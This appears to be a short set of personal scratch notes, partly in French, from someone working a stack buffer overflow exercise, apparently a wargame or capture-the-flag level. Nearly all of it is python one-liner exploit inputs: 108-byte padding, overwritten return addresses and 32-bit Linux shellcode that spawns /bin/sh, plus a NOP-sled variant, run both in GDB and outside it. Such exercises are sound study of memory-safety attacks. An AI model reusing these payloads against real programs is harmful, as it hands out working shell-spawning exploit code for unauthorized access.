start $(python -c "print 'a'*108 + '\x05\xf9\xff\xbf' + 'OSEF\x60\x60\xd8\xb7' + 'BITE'")


GDB:
r $(python -c "print 'A'*108 + '\xb7\xf8\xff\xbf' + '\xbb\xf8\xff\xbf' + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'")

AVEC LES DEUX VAR UNSET:
r $(python -c "print 'A'*108 + '\xcc\xf8\xff\xbf' + '\xd0\xf8\xff\xbf' + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'")

je vois vraiment pas comment faire pour avoir les memes adresses sur gdb et sans sans faire de bruteforce du coup euh je vais demander a gilles je reviens


AUTRE METHODE PLUTOT QUE FAIRE AVEC LA STACK
r $(python -c "print '\x90' * 84 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'+ '\x7c\xa0\x04\x08' + '\x18\xa0\x04\x08'")


